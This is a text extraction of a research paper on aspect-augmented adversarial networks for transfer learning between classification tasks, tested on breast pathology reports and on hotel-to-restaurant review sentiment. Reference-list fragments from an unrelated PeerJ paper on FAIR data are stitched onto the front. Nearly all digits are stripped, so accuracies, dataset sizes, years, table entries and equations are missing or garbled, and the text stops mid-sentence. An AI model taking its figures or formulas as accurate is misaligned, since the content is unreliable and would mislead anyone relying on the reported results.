bourne pe, bouwman j, brookes aj, wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /journal.pbio. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /nar/gkv https://www.w .org/tr/ldp/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . / a http://dx.doi.org/ . /bioinformatics/btg http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /ejhg. . http://arxiv.org/abs/ . http://www.w .org/tr/vocab-dcat http://www.w .org/tr/vocab-dcat http://dx.doi.org/ . /peerj-cs. clark t, crosas m, dillo i, dumon o, edmunds s, evelo ct, finkers r, gonzalez- beltran a, gray ajg, groth p, goble c, grethe js, heringa j, hoen pac, hooft r, kuhn t, kok r, kok j, lusher sj, martone me, mons a, packer al, persson b, rocca-serra p, roos m, schaik r, sansone s-a, schultes e, sengstag t, slater t, strawn g, swertz ma, thompson m, van der lei j, van mulligen e, velterop j, waagmeester a, wittenburg p, wolstencroft k, zhao j, mons b. . the fair guiding principles for scientific data management and stewardship. scientific data : doi . /sdata. . . wilkinson md, senger m, kawas e, bruskiewich r, gouzy j, noirot c, bardou p, ng a, haase d, saiz eda, wang d, gibbons f, gordon pmk, sensen cw, carrasco jmr, fernández jm, shen l, links m, ng m, opushneva n, neerincx pbt, leunissen jam, ernst r, twigger s, usadel b, good b, wong y, stein l, crosby w, karlsson j, royo r, párraga i, ramírez s, gelpi jl, trelles o, pisano dg, jimenez n, ker- hornou a, rosset r, zamacola l, tarraga j, huerta-cepas j, carazo jm, dopazo j, guigo r, navarro a, orozco m, valencia a, claros mg, pérez aj, aldana j, rojano mm, fernandez-santa cruz r, navas i, schiltz g, farmer a, gessler d, schoof h, groscurth a. . interoperability with moby . –it’s better than sharing your toothbrush!. briefings in bioinformatics : – doi . /bib/bbn . wilkinson md, vandervalk b, mccarthy l. . the semantic automated discovery and integration (sadi) web service design-pattern, api and reference implementa- tion. journal of biomedical semantics : doi . / - - - . withers d, kawas e, mccarthy l, vandervalk b, wilkinson m. . semantically- guided workflow construction in taverna: the sadi and biomoby plug-ins. in: isola : leveraging applications of formal methods, verification, and validation, – . wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /sdata. . http://dx.doi.org/ . /bib/bbn http://dx.doi.org/ . / - - - http://dx.doi.org/ . /peerj-cs. aspect-augmented adversarial networks for domain adaptation yuan zhang, regina barzilay, and tommi jaakkola computer science and artificial intelligence laboratory massachusetts institute of technology {yuanzh, regina, tommi}@csail.mit.edu abstract we introduce a neural method for transfer learning between two (source and target) clas- sification tasks or aspects over the same do- main. rather than training on target la- bels, we use a few keywords pertaining to source and target aspects indicating sentence relevance instead of document class labels. documents are encoded by learning to em- bed and softly select relevant sentences in an aspect-dependent manner. a shared classi- fier is trained on the source encoded docu- ments and labels, and applied to target en- coded documents. we ensure transfer through aspect-adversarial training so that encoded documents are, as sets, aspect-invariant. ex- perimental results demonstrate that our ap- proach outperforms different baselines and model variants on two datasets, yielding an improvement of % on a pathology dataset and % on a review dataset. introduction many nlp problems are naturally multitask classi- fication problems. for instance, values extracted for different fields from the same document are often dependent as they share the same context. exist- ing systems rely on this dependence (transfer across fields) to improve accuracy. in this paper, we con- sider a version of this problem where there is a clear dependence between two tasks but annotations are available only for the source task. for example, the code is available at https://github.com/ yuanzh/aspect_adversarial. pathology report: • final diagnosis: breast (left) … invasive ductal carcinoma: identified. carcinoma tumor size: num cm. grade: . … lymphatic vessel invasion: identified. blood vessel invasion: suspicious. margin of invasive carcinoma … diagnosis results: source (idc): positive target (lvi): positive figure : a snippet of a breast pathology report with diagnosis results for two types of disease (aspects): carcinoma (idc) and lymph invasion (lvi). note how the same phrase indicating positive results (e.g. identified) is applicable to both aspects. a transfer model learns to map other key phrases (e.g. grade ) to such shared indicators. the target goal may be to classify pathology reports (shown in figure ) for the presence of lymph in- vasion but training data are available only for car- cinoma in the same reports. we call this problem aspect transfer as the objective is to learn to classify examples differently, focusing on different aspects, without access to target aspect labels. clearly, such transfer learning is possible only with auxiliary in- formation relating the tasks together. the key challenge is to articulate and incorpo- rate commonalities across the tasks. for instance, in classifying reviews of different products, sentiment words (referred to as pivots) can be shared across the products. this commonality enables one to align feature spaces across multiple products, enabling useful transfer (?). similar properties hold in other contexts and beyond sentiment analysis. figure transactions of the association for computational linguistics, vol. , pp. – , . action editor: hal daumé iii . submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. shows that certain words and phrases like “identi- fied”, which indicates the presence of a histologi- cal property, are applicable to both carcinoma and lymph invasion. our method learns and relies on such shared indicators, and utilizes them for effec- tive transfer. the unique feature of our transfer problem is that both the source and the target classifiers operate over the same domain, i.e., the same examples. in this setting, traditional transfer methods will always pre- dict the same label for both aspects and thus lead- ing to failure. instead of supplying the target classi- fier with direct training labels, our approach builds on a secondary relationship between the tasks using aspect-relevance annotations of sentences. these relevance annotations indicate a possibility that the answer could be found in a sentence, not what the answer is. one can often write simple keyword rules that identify sentence relevance to a particular as- pect through representative terms, e.g., specific hor- monal markers in the context of pathology reports. annotations of this kind can be readily provided by domain experts, or extracted from medical literature such as codex rules in pathology (pantanowitz et al., ). we assume a small number of relevance an- notations (rules) pertaining to both source and target aspects as a form of weak supervision. we use this sentence-level aspect relevance to learn how to en- code the examples (e.g., pathology reports) from the point of view of the desired aspect. in our approach, we construct different aspect-dependent encodings of the same document by softly selecting sentences relevant to the aspect of interest. the key to effective transfer is how these encodings are aligned. this encoding mechanism brings the problem closer to the realm of standard domain adaptation, where the derived aspect-specific representations are considered as different domains. given these rep- resentations, our method learns a label classifier shared between the two domains. to ensure that it can be adjusted only based on the source class la- bels, and that it also reasonably applies to the tar- get encodings, we must align the two sets of en- coded examples. learning this alignment is pos- this alignment or invariance is enforced on the level of sets, not individual reports; aspect-driven encoding of any specific report should remain substantially different for the two tasks since the encoded examples are passed on to the same classifier. sible because, as discussed above, some keywords are directly transferable and can serve as anchors for constructing this invariant space. to learn this invariant representation, we introduce an adversar- ial domain classifier analogous to the recent suc- cessful use of adversarial training in computer vi- sion (ganin and lempitsky, ). the role of the domain classifier (adversary) is to learn to distin- guish between the two types of encodings. during training we update the encoder with an adversarial objective to cause the classifier to fail. the encoder therefore learns to eliminate aspect-specific infor- mation so that encodings look invariant (as sets) to the classifier, thus establishing aspect-invariance en- codings and enabling transfer. all three components in our approach, ) aspect-driven encoding, ) clas- sification of source labels, and ) domain adversary, are trained jointly (concurrently) to complement and balance each other. adversarial training of domain and label classi- fiers can be challenging to stabilize. in our setting, sentences are encoded with a convolutional model. feedback from adversarial training can be an un- stable guide for how the sentences should be en- coded. to address this issue, we incorporate an ad- ditional word-level auto-encoder reconstruction loss to ground the convolutional processing of sentences. we empirically demonstrate that this additional ob- jective yields richer and more diversified feature rep- resentations, improving transfer. we evaluate our approach on pathology reports (aspect transfer) as well as on a more standard re- view dataset (domain adaptation). on the pathology dataset, we explore cross-aspect transfer across dif- ferent types of breast disease. specifically, we test on six adaptation tasks, consistently outperforming all other baselines. overall, our full model achieves % and . % absolute improvement arising from aspect-driven encoding and adversarial training re- spectively. moreover, our unsupervised adaptation method is only . % behind the accuracy of a super- vised target model. on the review dataset, we test adaptations from hotel to restaurant reviews. our model outperforms the marginalized denoising au- toencoder (chen et al., ) by %. finally, we examine and illustrate the impact of individual com- ponents on the resulting performance. related work domain adaptation for deep learning exist- ing approaches commonly induce abstract represen- tations without pulling apart different aspects in the same example, and therefore are likely to fail on the aspect transfer problem. the majority of these prior methods first learn a task-independent representa- tion, and then train a label predictor (e.g. svm) on this representation in a separate step. for ex- ample, earlier researches employ a shared autoen- coder (glorot et al., ; chopra et al., ) to learn a cross-domain representation. chen et al. ( ) further improve and stabilize the represen- tation learning by utilizing marginalized denoising autoencoders. later, zhou et al. ( ) propose to minimize domain-shift of the autoencoder in a linear data combination manner. other researches have fo- cused on learning transferable representations in an end-to-end fashion. examples include using trans- duction learning for object recognition (sener et al., ) and using residual transfer networks for image classification (long et al., ). in contrast, we use adversarial training to encourage learning domain- invariant features in a more explicit way. our ap- proach offers another two advantages over prior work. first, we jointly optimize features with the final classification task while many previous works only learn task-independent features using autoen- coders. second, our model can handle traditional domain transfer as well as aspect transfer, while pre- vious methods can only handle the former. adversarial learning in vision and nlp our approach closely relates to the idea of domain- adversarial training. adversarial networks were originally developed for image generation (good- fellow et al., ; makhzani et al., ; sprin- genberg, ; radford et al., ; taigman et al., ), and were later applied to domain adaptation in computer vision (ganin and lempitsky, ; ganin et al., ; bousmalis et al., ; tzeng et al., ) and speech recognition (shinohara, ). the core idea of these approaches is to promote the emergence of invariant image features by optimizing the feature extractor as an adversary against the do- main classifier. while ganin et al. ( ) also apply this idea to sentiment analysis, their practical gains have remained limited. our approach presents two main departures. in computer vision, adversarial learning has been used for transferring across domains, while our method can also handle aspect transfer. in addition, we in- troduce a reconstruction loss which results in more robust adversarial training. we believe that this for- mulation will benefit other applications of adversar- ial training, beyond the ones described in this paper. semi-supervised learning with keywords in our work, we use a small set of keywords as a source of weak supervision for aspect-relevance scoring. this relates to prior work on utilizing prototypes and seed words in semi-supervised learning (haghighi and klein, ; grenager et al., ; chang et al., ; mann and mccallum, ; jagarlamudi et al., ; li et al., ; eisenstein, ). all these prior approaches utilize prototype annotations primarily targeting model bootstrapping but not for learning representations. in contrast, our model uses provided keywords to learn aspect-driven encoding of input examples. attention mechanism in nlp one may view our aspect-relevance scorer as a sentence-level “semi-supervised attention”, in which relevant sen- tences receive more attention during feature extrac- tion. while traditional attention-based models typ- ically induce attention in an unsupervised manner, they have to rely on a large amount of labeled data for the target task (bahdanau et al., ; rush et al., ; chen et al., ; cheng et al., ; xu et al., ; xu and saenko, ; yang et al., ; martins and astudillo, ; lei et al., ). unlike these methods, our approach assumes no label annotations in the target domain. other re- searches have focused on utilizing human-provided rationales as “supervised attention” to improve pre- diction (zaidan et al., ; marshall et al., ; zhang et al., ; brun et al., ). in contrast, our model only assumes access to a small set of key- words as a source of weak supervision. moreover, all these prior approaches focus on in-domain clas- sification. in this paper, however, we study the task in the context of domain adaptation. multitask learning existing multitask learn- ing methods focus on the case where supervision is available for all tasks. a typical architecture in- volves using a shared encoder with a separate clas- sifier for each task. (caruana, ; pan and yang, ; collobert and weston, ; liu et al., ; bordes et al., ). in contrast, our work assumes labeled data only for the source aspect. we train a single classifier for both aspects by learning aspect- invariant representation that enables the transfer. problem formulation we begin by formalizing aspect transfer with the idea of differentiating it from standard domain adap- tation. in our setup, we have two classification tasks called the source and the target tasks. in contrast to source and target tasks in domain adaptation, both of these tasks are defined over the same set of ex- amples (here documents, e.g., pathology reports). what differentiates the two classification tasks is that they pertain to different aspects in the examples. if each training document were annotated with both the source and the target aspect labels, the problem would reduce to multi-label classification. however, in our setting training labels are available only for the source aspect so the goal is to solve the target task without any associated training label. to fix the notation, let d = {si}|d|i= be a document that consists of a sequence of |d| sentences si. given a document d, and the aspect of interest, we wish to predict the corresponding aspect-dependent class label y (e.g., y ∈ {− , }). we assume that the set of possible labels are the same across aspects. we use ysl;k to denote the k-th coordinate of a one-hot vector indicating the correct training source aspect label for document dl. target aspect labels are not available during training. beyond labeled documents for the source aspect {dl,ysl }l∈l, and shared unlabeled documents for source and target aspects {dl}l∈u , we assume fur- ther that we have relevance scores pertaining to each aspect. the relevance is given per sentence, for some subset of sentences across the documents, and indicates the possibility that the answer for that doc- ument would be found in the sentence but without indicating which way the answer goes. relevance is always aspect dependent yet often easy to provide in the form of simple keyword rules. we use rai ∈ { , } to denote the given relevance label pertaining to aspect a for sentence si. only a small subset of sentences in the training set have as- sociated relevance labels. let r = {(a,l, i)} de- note the index set of relevance labels such that if (a,l, i) ∈ r then aspect a’s relevance label ral,i is available for the ith sentence in document dl. in our case relevance labels arise from aspect-dependent keyword matches. rai = when the sentence con- tains any keywords pertaining to aspect a and rai = if it has any keywords of other aspects. separate subsets of relevance labels are available for each as- pect as the keywords differ. the transfer that is sought here is between two tasks over the same set of examples rather than be- tween two different types of examples for the same task as in standard domain adaptation. however, the two formulations can be reconciled if full relevance annotations are assumed to be available during train- ing and testing. in this scenario, we could simply lift the sets of relevant sentences from each document as new types of documents. the goal would be then to learn to classify documents of type t (consisting of sentences relevant to the target aspect) based on having labels only for type s (source) documents, a standard domain adaptation task. our problem is more challenging as the aspect-relevance of sen- tences must be learned from limited annotations. finally, we note that the aspect transfer problem and the method we develop to solve it work the same even when source and target documents are a priori different, something we will demonstrate later. methods . overview of our approach our model consists of three key components as shown in figure . each document is encoded in a relevance weighted, aspect-dependent manner (green, left part of figure ) and classified using the label predictor (blue, top-right). during training, the encoded documents are also passed on to the domain classifier (orange, bottom-right). the role of the do- main classifier, as the adversary, is to ensure that the aspect-dependent encodings of documents are distri- butionally matched. this matching justifies the use of the same end-classifier to provide the predicted label regardless of the task (aspect). rai = if the sentence contains keywords pertaining to both aspect a and other aspects. pathology report invasive ductal car- cinoma tumor size … grade: . ………………. lymphatic vessel in- vasion: not identified. … (idc) is identified … … … … r = . predicted relevance score … … r = . r = . … … d ocum ent representation transformation layer … … class label yl objective: predict labels sentence embeddings weighted combination adversary objective: confuse the domain classifier … domain label ya objective: predict domains backprop backprop (b) label predictor (c) domain classifier (a) document encoder r̂ = . r̂ = . r̂ = . figure : aspect-augmented adversarial network for transfer learning. the model is composed of (a) an aspect-driven document encoder, (b) a label predictor and (c) a domain classifier. to encode a document, the model first maps each sentence into a vector and then passes the vector to a scoring network to determine whether the sentence is relevant for the chosen aspect. these predicted relevance scores are used to obtain document vec- tors by taking relevance-weighted sum of the asso- ciated sentence vectors. thus, the manner in which the document vector is constructed is always aspect- dependent due to the chosen relevance weights. during training, the resulting adjusted document vectors are consumed by the two classifiers. the pri- mary label classifier aims to predict the source labels (when available), while the domain classifier deter- mines whether the document vector pertains to the source or target aspect, which is the label that we know by construction. furthermore, we jointly up- date the document encoder with a reverse of the gra- dient from the domain classifier, so that the encoder learns to induce document representations that fool the domain classifier. the resulting encoded repre- sentations will be aspect-invariant, facilitating trans- fer. our adversarial training scheme uses all the train- ing losses concurrently to adjust the model param- eters. during testing, we simply encode each test document in a target-aspect dependent manner, and apply the same label predictor. we expect that the same label classifier does well on the target task since it solves the source task, and operates on relevance-weighted representations that are matched across the tasks. while our method is designed to work in the extreme setting that the examples for the two aspects are the same, this is by no means a re- reconstruction of ductal carcinoma is identified … … … … … … … … …… …sentence embeddings max-pooling: … x x x x x̂ = tanh(w ch + b c) x h h xsen = max{h , h , . . .} figure : illustration of the convolutional model and the reconstruction of word embeddings from the as- sociated convolutional layer. quirement. our method will also work fine in the more traditional domain adaptation setting, which we will demonstrate later. . components in detail sentence embedding we apply a convolutional model illustrated in figure to each sentence si to obtain sentence-level vector embeddings xseni . the use of rnns or bi-lstms would result in more flex- ible sentence embeddings but based on our initial ex- periments, we did not observe any significant gains over the simpler cnns. we further ground the resulting sentence embed- dings by including an additional word-level recon- struction step in the convolutional model. the pur- pose of this reconstruction step is to balance adver- sarial training signals propagating back from the do- main classifier. specifically, it forces the sentence encoder to keep rich word-level information in con- trast to adversarial training that seeks to eliminate aspect specific features. we provide an empirical analysis of the impact of this reconstruction in the experiment section (section ). more concretely, we reconstruct word embed- ding from the corresponding convolutional layer, as shown in figure . we use xi,j to denote the em- bedding of the j-th word in sentence si. let hi,j be the convolutional output when xi,j is at the center of the window. we reconstruct xi,j by x̂i,j = tanh(w chi,j + b c) ( ) where wc and bc are parameters of the reconstruc- tion layer. the loss associated with the reconstruc- tion for document d is lrec(d) = n ∑ i,j ||x̂i,j − tanh(xi,j)|| ( ) where n is the number of tokens in the document and indexes i, j identify the sentence and word, respec- tively. the overall reconstruction loss lrec is ob- tained by summing over all labeled/unlabeled docu- ments. relevance prediction we use a small set of keyword rules to generate binary relevance labels, both positive (r = ) and negative (r = ). these la- bels represent the only supervision available to pre- dict relevance. the prediction is made on the basis of the sentence vector xseni passed through a feed- forward network with a relu output unit. the net- work has a single shared hidden layer and a separate output layer for each aspect. note that our relevance prediction network is trained as a non-negative re- gression model even though the available labels are binary, as relevance varies more on a linear rather than binary scale. given relevance labels indexed by r = {(a,l, i)}, we minimize lrel = ∑ (a,l,i)∈r ( ral,i − r̂al,i ) ( ) where r̂al,i is the predicted (non-negative) relevance score pertaining to aspect a for the ith sentence in document dl, as shown in the left part of figure . ral,i, defined earlier, is the given binary ( / ) rele- vance label. we use a score in [ , ] scale because it can be naturally used as a weight for vector combi- nations, as shown next. this process is omitted in figure for brevity. document encoding the initial vector repre- sentation for each document such as dl is obtained as a relevance weighted combination of the associ- ated sentence vectors, i.e., x doc,a l = ∑ i r̂ a l,i ·xsenl,i∑ i r̂ a l,i ( ) the resulting vector selectively encodes information from the sentences based on relevance to the focal aspect. transformation layer the manner in which document vectors arise from sentence vectors means that they will retain aspect-specific information that will hinder transfer across aspects. to help re- move non-transferable information, we add a trans- formation layer to map the initial document vectors x doc,a l to their domain invariant (as a set) versions, as shown in figure . specifically, the transformed rep- resentation is given by xtr,al = w trx doc,a l . mean- while, the transformation has to be strongly regular- ized lest the gradient from the adversary would wipe out all the document signal. we add the following regularization term Ωtr = λtr||wtr − i|| f ( ) to discourage significant deviation away from iden- tity i. λtr is a regularization parameter that has to be set separately based on validation performance. we show an empirical analysis of the impact of this transformation layer in section . primary label classifier as shown in the top- right part of figure , the classifier takes in the adjusted document representation as an input and predicts a probability distribution over the possible class labels. the classifier is a feed-forward net- work with a single hidden layer using relu acti- vations and a softmax output layer over the possible class labels. note that we train only one label clas- sifier that is shared by both aspects. the classifier operates the same regardless of the aspect to which the document was encoded. it must therefore be co- operatively learned together with the encodings. let p̂l;k denote the predicted probability of class k for document dl when the document is encoded from the point of view of the source aspect. recall that [ysl; , . . . ,y s l;m] is a one-hot vector for the correct (given) source class label for document dl, hence also a distribution. we use the cross-entropy loss for the label classifier llab = ∑ l∈l [ − m∑ k= ysl;k log p̂l;k ] ( ) domain classifier as shown in the bottom- right part of figure , the domain classifier func- tions as an adversary to ensure that the documents encoded with respect to the source and target as- pects look the same as sets of examples. the in- variance is achieved when the domain classifier (as the adversary) fails to distinguish between the two. structurally, the domain classifier is a feed-forward network with a single relu hidden layer and a soft- max output layer over the two aspect labels. let ya = [ya ,y a ] denote the one-hot domain la- bel vector for aspect a ∈ {s,t}. in other words, ys = [ , ] and yt = [ , ]. we use q̂k(x tr,a l ) as the predicted probability that the domain label is k when the domain classifier receives xtr,al as the input. the domain classifier is trained to minimize ldom = ∑ l∈l∪u ∑ a∈{s,t} [ − ∑ k= yak log q̂k(x tr,a l ) ] ( ) . joint learning we combine the individual component losses per- taining to word reconstruction, relevance labels, transformation layer regularization, source class la- bels, and domain adversary into an overall objective function lall = lrec + lrel + Ωtr + llab −ρldom ( ) which is minimized with respect to the model pa- rameters except for the adversary (domain classi- fier). the adversary is maximizing the same objec- tive with respect to its own parameters. the last term −ρldom corresponds to the objective of causing the domain classifier to fail. the proportionality con- stant ρ controls the impact of gradients from the ad- versary on the document representation; the adver- sary itself is always directly minimizing ldom. all the parameters are optimized jointly using standard backpropagation (concurrent for the adver- sary). each mini-batch is balanced by aspect, half dataset #labeled #unlabeled pathology dcis . k . k lcis . k idc . k alh . k review hotel k k restaurant - k table : statistics of the pathology reports dataset and the reviews dataset that we use for training. our model utilizes both labeled and unlabeled data. aspect keywords idc idc, invasive ductal carcinoma alh alh, atypical lobular hyperplasia table : examples of aspects and their correspond- ing keywords (case insensitive) in the pathology dataset. coming from the source, the other half from the tar- get. all the loss functions except llab make use of both labeled and unlabeled documents. addition- ally, it would be straightforward to add a loss term for target labels if they are available. experimental setup pathology dataset this dataset contains . k breast pathology reports collected from three hos- pitals (yala et al., ). a portion of this dataset is manually annotated with categorical values, representing various aspects of breast disease. in our experiments, we focus on four aspects related to carcinomas and atypias: ductal carcinoma in- situ (dcis), lobular carcinoma in-situ (lcis), in- vasive ductal carcinoma (idc) and atypical lob- ular hyperplasia (alh). each aspect is annotated using binary labels. we use held out reports as our test set and use the rest of the labeled data as our training set: . k reports for dcis, . k for lcis, . k for idc, and . k for alh. table summa- rizes statistics of the dataset. we explore the adaptation problem from one as- pect to another. for example, we want to train a model on annotations of dcis and apply it on lcis. for each aspect, we use up to three common names as a source of supervision for learning the relevance scorer, as illustrated in table . note that the pro- vided list is by no means exhaustive. in fact buckley et al. ( ) provide example of different verbal- izations of lcis, not counting negations. review dataset our second experiment is based on a domain transfer of sentiment classifica- tion. for the source domain, we use the hotel re- view dataset introduced in previous work (wang et al., ; wang et al., ), and for the target domain, we use the restaurant review dataset from yelp. both datasets have ratings on a scale of to stars. following previous work (blitzer et al., ), we label reviews with ratings > as posi- tive and those with ratings < as negative, discard- ing the rest. the hotel dataset includes a total of around k reviews collected from tripadvisor, so we split k as labeled and the other k as unlabeled data. we randomly select k restaurant reviews as the unlabeled data in the target domain. our test set consists of k reviews. table summa- rizes the statistics of the review dataset. the hotel reviews naturally have ratings for six aspects, including value, room quality, checkin ser- vice, room service, cleanliness and location. we use the first five aspects because the sixth aspect loca- tion has positive labels for over % of the reviews and thus the trained model will suffer from the lack of negative examples. the restaurant reviews, how- ever, only have single ratings for an overall impres- sion. therefore, we explore the task of adaptation from each of the five hotel aspects to the restau- rant domain. the hotel reviews dataset also pro- vides a total of keywords for different aspects that are generated by the bootstrapping method used in wang et al. ( ). we use those keywords as supervision for learning the relevance scorer. baselines and our method we first compare against a linear svm trained on the raw bag- of-words representation of labeled data in source. second, we compare against our sourceonly model that assumes no target domain data or key- words. it thus has no adversarial training or tar- get aspect-relevance scoring. next we compare the restaurant portion of https://www.yelp.com/ dataset_challenge. https://www.tripadvisor.com/ method source target key- wordlab. unlab. lab. unlab. svm x × × × × sourceonly x x × × x msda x x × x × aan-na x x × x x aan-nr x x × x × in-domain × × x × x aan-full x x × x x table : usage of labeled (lab.), unlabeled (un- lab.) data and keyword rules in each domain by our model and other baseline methods. aan-* denote our model and its variants. with marginalized stacked denoising autoencoders (msda) (chen et al., ), a domain adaptation algorithm that outperforms both prior deep learning and shallow learning approaches. in the rest part of the paper, we name our method and its variants as aan (aspect-augmented adversarial networks). we compare against aan- na and aan-nr that are our model variants without adversarial training and without aspect- relevance scoring respectively. finally we in- clude supervised models trained on the full set of in-domain annotations as the performance upper bound. table summarizes the usage of labeled and unlabeled data in each domain as well as keyword rules by our model (aan-full) and different base- lines. note that our model assumes the same set of data as the aan-na, aan-nr and msda meth- ods. implementation details following prior work (ganin and lempitsky, ), we gradually increase the adversarial strength ρ and decay the learning rate during training. we also apply batch normalization (ioffe and szegedy, ) on the sentence encoder and apply dropout with a ratio of . on word em- beddings and each hidden layer activation. we set the hidden layer size to and pick the transforma- tion regularization weight λt = . for the pathol- we use the publicly available implementation provided by the authors at http://www.cse.wustl.edu/˜mchen/ code/msda.tar. we use the hyper-parameters from the au- thors and their models have more parameters than ours. domain svm source msda aan-na aan-nr aan-full in-domain source target only lcis dcis . . . . . . . idc . . . . . . alh . . . . . . dcis lcis . . . . . . . idc . . . . . . alh . . . . . . dcis idc . . . . . . . lcis . . . . . . alh . . . . . . dcis alh . . . . . . . lcis . . . . . . idc . . . . . . average . . . . . . . table : pathology: classification accuracy (%) of different approaches on the pathology reports dataset, including the results of twelve adaptation scenarios from four different aspects (idc, alh, dcis and lcis) in breast cancer pathology reports. “msda” indicates the marginalized denoising autoencoder in (chen et al., ). “aan-na” and “aan-nr” corresponds to our model without the adversarial training and the aspect-relevance scoring component, respectively. we also include in the last column the in-domain supervised training results of our model as the performance upper bound. boldface numbers indicate the best accuracy for each testing scenario. ogy dataset and λt = . for the review dataset. main results table summarizes the classification accuracy of different methods on the pathology dataset, includ- ing the results of twelve adaptation tasks. our full model (aan-full) consistently achieves the best performance on each task compared with other base- lines and model variants. it is not surprising that svm and msda perform poorly on this dataset be- cause they only predict labels based on an overall feature representation of the input, and do not utilize weak supervision provided by aspect-specific key- words. as a reference, we also provide a perfor- mance upper bound by training our model on the full labeled set in the target domain, denoted as in- domain in the last column of table . on average, the accuracy of our model (aan-full) is only . % behind this upper bound. table shows the adaptation results from each aspect in the hotel reviews to the overall ratings of restaurant reviews. aan-full and aan-nr are the two best performing systems on this review dataset, attaining around % improvement over the msda baseline. below, we summarize our findings when comparing the full model with the two model vari- ants aan-na and aan-nr. impact of adversarial training we first focus on comparisons between aan-full and aan-na. the only difference between the two models is that aan-na has no adversarial training. on the pathol- ogy dataset, our model significantly outperforms aan-na, yielding a . % absolute average gain (see table ). on the review dataset, our model obtains . % average improvement over aan-na. as shown in table , the gains are more significant when training on room and checkin aspects, reaching . % and . %, respectively. impact of relevance scoring as shown in ta- ble , the relevance scoring component plays a cru- cial role in classification on the pathology dataset. domain svm source msda aan-na aan-nr aan-full in-domain source target only value restaurant overall . . . . . . . room . . . . . . checkin . . . . . . service . . . . . . cleanliness . . . . . . average . . . . . . . table : review: classification accuracy (%) of different approaches on the reviews dataset. columns have the same meaning as in table . boldface numbers indicate the best accuracy for each testing scenario. . . . . . . w/o reconstruction with reconstruction . . . . . . +adversarial, -reconstruction-adversarial, -reconstruction +adversarial, +reconstruction figure : heat map of × matrices. each row corresponds to the vector representation of a document that comes from either the source domain (top half) or the target domain (bottom half). models are trained on the review dataset when room quality is the source aspect. our model achieves more than % improvement over aan-nr. this is because, in general, aspects have zero correlations to each other in pathology reports. therefore, it is essential for the model to have the capacity of distinguishing across different aspects in order to succeed in this task. on the review dataset, however, we observe that relevance scoring has no significant impact on per- formance. on average, aan-nr actually outper- forms aan-full by . %. this observation can be explained by the fact that different aspects in ho- tel reviews are highly correlated to each other. for example, the correlation between room quality and cleanliness is . , much higher than aspect corre- lations in the pathology dataset. in other words, the sentiment is typically consistent across all sen- tences in a review, so that selecting aspect-specific sentences becomes unnecessary. moreover, our su- pervision for the relevance scorer is weak and noisy because the aspect keywords are obtained in a semi- automatic way. therefore, it is not surprising that aan-nr sometimes delivers a better classification dataset aan-full aan-na -rec. +rec. -rec. +rec. pathology . . . . review . . . . table : impact of adding the reconstruction com- ponent in the model, measured by the average ac- curacy on each dataset. +rec. and -rec. denote the presence and absence of the reconstruction loss, respectively. accuracy than aan-full. analysis impact of the reconstruction loss table summarizes the impact of the reconstruction loss on the model performance. for our full model (aan- full), adding the reconstruction loss yields an aver- age of . % gain on the pathology dataset and . % on the review dataset. restaurant reviews • the fries were undercooked and thrown haphazardly into the sauce holder . the shrimp was over cooked and just deepfried . … even the water tasted weird . … • i had the shrimp boil and it was very under- seasoned . much closer to bland than anything . … • the room was old . … we did n’t like the night shows at all . … • however , the decor was just fair . … the doorknob to our bathroom door fell off , as well as the handle on the toilet . … in the second bedroom it literally rained water from above . • the room decor was not entirely modern . … we just had the run of the mill hotel room without a view . • stay away from fresh vegetable like lettuce , etc . … • rest room in this restaurant is very dirty . … • the only problem i had was that … i was very ill with what was suspected to be food poison • probably the noisiest room he could have given us in the whole hotel . nearest hotel reviews by ours-full nearest hotel reviews by ours-na restaurant reviews • the fries were undercooked and thrown haphazardly into the sauce holder . the shrimp was over cooked and just deepfried . … even the water tasted weird . … • the room was old . … we did n’t like the night shows at all . … • however , the decor was just fair . … in the second bedroom it literally rained water from above . • rest room in this restaurant is very dirty . … • the only problem i had was that … i was very ill with what was suspected to be food poison nearest hotel reviews by ours-full nearest hotel reviews by ours-na figure : examples of restaurant reviews and their nearest neighboring hotel reviews induced by different models (column and ). we use room quality as the source aspect. the sentiment phrases of each review are in blue, and some reviews are also shortened for space. dataset λt = < λt < ∞ λt = ∞ pathology . . . review . . . table : the effect of regularization of the transfor- mation layer λt on the performance. to analyze the reasons behind this difference, consider figure that shows the heat maps of the learned document representations on the review dataset. the top half of the matrices corresponds to input documents from the source domain and the bottom half corresponds to the target domain. un- like the first matrix, the other two matrices have no significant difference between the two halves, in- dicating that adversarial training helps learning of domain-invariant representations. however, adver- sarial training also removes a lot of information from representations, as the second matrix is much more sparse than the first one. the third matrix shows that adding reconstruction loss effectively addresses this sparsity issue. almost % of the entries of the second matrix have small values (< − ) while the sparsity is only about % for the third one. moreover, the standard deviation of the third ma- trix is also ten times higher than the second one. these comparisons demonstrate that the reconstruc- tion loss function improves both the richness and diversity of the learned representations. note that in the case of no adversarial training (aan-na), adding the reconstruction component has no clear effect. this is expected because the main motiva- tion of adding this component is to achieve a more robust adversarial training. regularization on the transformation layer table shows the averaged accuracy with differ- ent regularization weights λt in equation . we change λt to reflect different model variants. first, λt = ∞ corresponds to the removal of the transfor- mation layer because the transformation is always identity in this case. our model performs better than this variant on both datasets, yielding an average improvement of . % on the pathology dataset and . % on the review dataset. this result indicates the importance of adding the transformation layer. sec- ond, using zero regularization (λt = ) also consis- tently results in inferior performance, such as . % loss on the pathology dataset. we hypothesize that zero regularization will dilute the effect from re- construction because there is too much flexibility in transformation. as a result, the transformed repre- sentation will become sparse due to the adversarial training, leading to a performance loss. examples of neighboring reviews finally, in figure we illustrate a case study on the charac- teristics of learned abstract representations by dif- ferent models. the first column shows an example restaurant review. sentiment phrases in this example are mostly food-specific, such as “undercooked” and “tasted weird”. in the other two columns, we show example hotel reviews that are nearest neighbors to the restaurant reviews, measured by cosine simi- larity between their representations. in column , many sentiment phrases are specific for room qual- ity, such as “old” and “rained water from above”. in column , however, most sentiment phrases are either common sentiment expressions (e.g. dirty) or food-related (e.g. food poison), even though the focus of the reviews is based on the room quality of hotels. this observation indicates that adversar- ial training (aan-full) successfully learns to elim- inate domain-specific information and to map those domain-specific words into similar domain-invariant figure : classification accuracy (y-axis) on two transfer scenarios (one on review and one on pathol- ogy dataset) with a varied number of keyword rules for learning sentence relevance (x-axis). representations. in contrast, aan-na only captures domain-invariant features from phrases that 